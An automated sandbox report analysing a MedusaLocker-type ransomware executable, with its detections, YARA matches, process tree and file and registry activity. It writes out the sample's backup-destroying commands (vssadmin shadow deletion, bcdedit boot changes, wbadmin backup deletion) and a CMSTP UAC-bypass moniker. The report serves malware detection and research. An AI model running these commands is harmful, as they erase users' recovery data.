Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
98j0BL6iLT.exe

Overview

General Information

Sample Name:98j0BL6iLT.exe
Analysis ID:791695
MD5:646698572afbbf24f50ec5681feb2db7
SHA1:70530bc23bad38e6aee66cbb2c2f58a96a18fb79
SHA256:26af2222204fca27c0fdabf9eefbfdb638a8a9322b297119f85cce3c708090f0
Tags:exeRansomware
Infos:

Detection

MedusaLocker, Babuk, Conti, Marlock
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Conti ransomware
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Yara detected MedusaLocker Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Babuk Ransomware
Antivirus / Scanner detection for submitted sample
Sigma detected: MedusaLocker
Yara detected Marlock Ransomware
Yara detected RansomwareGeneric
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Contains functionality to modify Windows User Account Control (UAC) settings
Spreads via windows shares (copies files to share folders)
Machine Learning detection for sample
Writes many files with high entropy
Machine Learning detection for dropped file
Writes a notice file (html or txt) to demand a ransom
Deletes shadow drive data (may be related to ransomware)
Disables UAC (registry)
May use bcdedit to modify the Windows boot settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 98j0BL6iLT.exe (PID: 6072 cmdline: C:\Users\user\Desktop\98j0BL6iLT.exe MD5: 646698572AFBBF24F50EC5681FEB2DB7)
    • vssadmin.exe (PID: 2304 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 5876 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5908 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 4924 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5932 cmdline: vssadmin.exe Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 68 cmdline: wmic.exe SHADOWCOPY /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svhost.exe (PID: 6088 cmdline: C:\Users\user\AppData\Roaming\svhost.exe MD5: 646698572AFBBF24F50EC5681FEB2DB7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
98j0BL6iLT.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    98j0BL6iLT.exeJoeSecurity_MedusaLockerYara detected MedusaLocker RansomwareJoe Security
      98j0BL6iLT.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x9d46a:$s1: CoGetObject
      • 0x93e9c:$s2: Elevation:Administrator!new:
      98j0BL6iLT.exeMALWARE_Win_MedusaLockerDetects MedusaLocker ransomwareditekshen
      • 0x8163c:$s4: [LOCKER]
      • 0x8165c:$s4: [LOCKER]
      • 0x8168c:$s4: [LOCKER]
      • 0x81708:$s4: [LOCKER]
      • 0x81744:$s4: [LOCKER]
      • 0x81770:$s4: [LOCKER]
      • 0x8179c:$s4: [LOCKER]
      • 0x817cc:$s4: [LOCKER]
      • 0x81808:$s4: [LOCKER]
      • 0x8185c:$s4: [LOCKER]
      • 0x81890:$s4: [LOCKER]
      • 0x818f4:$s4: [LOCKER]
      • 0x81930:$s4: [LOCKER]
      • 0x81978:$s4: [LOCKER]
      • 0x819ac:$s4: [LOCKER]
      • 0x819e4:$s4: [LOCKER]
      • 0x81c50:$s4: [LOCKER]
      • 0x81c88:$s4: [LOCKER]
      • 0x81a10:$cmd2: vssadmin.exe Delete
      • 0x81a60:$cmd3: bcdedit.exe /set {default}
      • 0x81ac0:$cmd3: bcdedit.exe /set {default}
      98j0BL6iLT.exeRAN_MedusaLocker_Aug_2021_1Detect MedusaLocker ransomwareArkbird_SOLG
      • 0x816b8:$s1: {8761ABBD-7F85-42EE-B272-A76179687C63}
      • 0x50b1:$s2: 83 C4 08 8D 8D C0 FE FF FF E8 81 F8 FF FF 8D 8D B8 FE FF FF E8 76 F8 FF FF 68 8C 26 48 00 8D 8D 09 FF FF FF E8 26 B4 FF FF 8B C8 E8 CF BA FF FF 68 B8 26 48 00 8D 8D A0 FE FF FF E8 DF 1F 00 00 ...
      • 0x81ac0:$s3: 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 62 00 6F 00 6F 00 74 00 73 00 ...
      • 0x81cd0:$s4: 42 67 49 41 41 41 43 6B 41 41 42 53 55 30 45 78
      • 0x81ba8:$s5: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      • 0x81a60:$s6: 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2E 00 65 00 78 00 65 00 20 00 2F 00 73 00 65 00 74 00 20 00 7B 00 64 00 65 00 66 00 61 00 75 00 6C 00 74 00 7D 00 20 00 72 00 65 00 63 00 6F 00 76 00 ...
      • 0x81a10:$s7: 76 00 73 00 73 00 61 00 64 00 6D 00 69 00 6E 00 2E 00 65 00 78 00 65 00 20 00 44 00 65 00 6C 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6F 00 77 00 73 00 20 00 2F 00 41 00 6C 00 6C 00 ...
      • 0x81c08:$s8: 77 00 6D 00 69 00 63 00 2E 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4F 00 57 00 43 00 4F 00 50 00 59 00 20 00 2F 00 6E 00 6F 00 69 00 6E 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 ...
      • 0x81b60:$s9: 77 00 62 00 61 00 64 00 6D 00 69 00 6E 00 20 00 44 00 45 00 4C 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4D 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4B 00 55 00 50
      • 0x81ba8:$s9: 77 00 62 00 61 00 64 00 6D 00 69 00 6E 00 20 00 44 00 45 00 4C 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4D 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4B 00 55 00 50

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\svhost.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Roaming\svhost.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x9d46a:$s1: CoGetObject
        • 0x93e9c:$s2: Elevation:Administrator!new:
        C:\Users\user\AppData\Roaming\svhost.exeMALWARE_Win_MedusaLockerDetects MedusaLocker ransomwareditekshen
        • 0x8163c:$s4: [LOCKER]
        • 0x8165c:$s4: [LOCKER]
        • 0x8168c:$s4: [LOCKER]
        • 0x81708:$s4: [LOCKER]
        • 0x81744:$s4: [LOCKER]
        • 0x81770:$s4: [LOCKER]
        • 0x8179c:$s4: [LOCKER]
        • 0x817cc:$s4: [LOCKER]
        • 0x81808:$s4: [LOCKER]
        • 0x8185c:$s4: [LOCKER]
        • 0x81890:$s4: [LOCKER]
        • 0x818f4:$s4: [LOCKER]
        • 0x81930:$s4: [LOCKER]
        • 0x81978:$s4: [LOCKER]
        • 0x819ac:$s4: [LOCKER]
        • 0x819e4:$s4: [LOCKER]
        • 0x81c50:$s4: [LOCKER]
        • 0x81c88:$s4: [LOCKER]
        • 0x81a10:$cmd2: vssadmin.exe Delete
        • 0x81a60:$cmd3: bcdedit.exe /set {default}
        • 0x81ac0:$cmd3: bcdedit.exe /set {default}

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_MedusaLockerYara detected MedusaLocker RansomwareJoe Security
            00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MedusaLockerYara detected MedusaLocker RansomwareJoe Security
                00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_MedusaLockerYara detected MedusaLocker RansomwareJoe Security
                  Click to see the 13 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.98j0BL6iLT.exe.9d0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.0.98j0BL6iLT.exe.9d0000.0.unpackJoeSecurity_MedusaLockerYara detected MedusaLocker RansomwareJoe Security
                      0.0.98j0BL6iLT.exe.9d0000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0x93f88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x94028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x9d46a:$s1: CoGetObject
                      • 0x93e9c:$s2: Elevation:Administrator!new:
                      0.0.98j0BL6iLT.exe.9d0000.0.unpackMALWARE_Win_MedusaLockerDetects MedusaLocker ransomwareditekshen
                      • 0x8163c:$s4: [LOCKER]
                      • 0x8165c:$s4: [LOCKER]
                      • 0x8168c:$s4: [LOCKER]
                      • 0x81708:$s4: [LOCKER]
                      • 0x81744:$s4: [LOCKER]
                      • 0x81770:$s4: [LOCKER]
                      • 0x8179c:$s4: [LOCKER]
                      • 0x817cc:$s4: [LOCKER]
                      • 0x81808:$s4: [LOCKER]
                      • 0x8185c:$s4: [LOCKER]
                      • 0x81890:$s4: [LOCKER]
                      • 0x818f4:$s4: [LOCKER]
                      • 0x81930:$s4: [LOCKER]
                      • 0x81978:$s4: [LOCKER]
                      • 0x819ac:$s4: [LOCKER]
                      • 0x819e4:$s4: [LOCKER]
                      • 0x81c50:$s4: [LOCKER]
                      • 0x81c88:$s4: [LOCKER]
                      • 0x81a10:$cmd2: vssadmin.exe Delete
                      • 0x81a60:$cmd3: bcdedit.exe /set {default}
                      • 0x81ac0:$cmd3: bcdedit.exe /set {default}
                      1.2.svhost.exe.e50000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        Click to see the 7 entries

                        Sigma Signatures

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Sigma detected: MedusaLocker
                        Source: Registry Key setAuthor: Joe Security: Data: Details: 98j0BL6iLT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\98j0BL6iLT.exe, ProcessId: 6072, TargetObject: HKEY_CURRENT_USER\Software\MDSLK\Self

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: 98j0BL6iLT.exeReversingLabs: Detection: 90%
                        Source: 98j0BL6iLT.exeVirustotal: Detection: 74%Perma Link
                        Antivirus / Scanner detection for submitted sample
                        Source: 98j0BL6iLT.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\svhost.exeAvira: detection malicious, Label: HEUR/AGEN.1213242
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\svhost.exeReversingLabs: Detection: 90%
                        Machine Learning detection for sample
                        Source: 98j0BL6iLT.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\svhost.exeJoe Sandbox ML: detected
                        Source: 0.3.98j0BL6iLT.exe.3415240.6.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 0.3.98j0BL6iLT.exe.3277c40.15.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 0.3.98j0BL6iLT.exe.3456c40.4.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E660F0 CryptEncrypt,1_2_00E660F0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E660D0 CryptDestroyKey,1_2_00E660D0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E66090 CryptGenKey,1_2_00E66090
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E661A0 CryptEncrypt,1_2_00E661A0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E66150 CryptExportKey,1_2_00E66150
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E66210 CryptExportKey,1_2_00E66210
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E65CB0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,1_2_00E65CB0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E655A0 CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,1_2_00E655A0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E65DA0 std::ios_base::good,CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,1_2_00E65DA0
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E65D30 CryptAcquireContextW,GetLastError,CryptAcquireContextW,1_2_00E65D30

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 98j0BL6iLT.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.249765327.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.246642887.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E70C80 CoInitialize,CLSIDFromString,IIDFromString,CoGetObject,task,CoUninitialize,1_2_00E70C80
                        Source: 98j0BL6iLT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49683 version: TLS 1.2
                        Source: 98j0BL6iLT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: PerfInst.pdb1 source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgfw.pdb source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb (`@ source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgr.pdb source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgr.pdbM source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000323B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: AbcpyDll.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgfw.pdbO source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerfInst.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: AcroTgts.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Spreads via windows shares (copies files to share folders)
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\$RECYCLE.BINJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\Recovery\WindowsRE\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: z:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: x:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: v:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: t:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: r:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: p:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: n:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: l:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: j:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: h:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: f:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: b:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: y:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: w:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: u:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: s:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: q:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: o:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: m:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: k:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: i:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: g:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: e:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: c:Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile opened: a:Jump to behavior
                        Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: 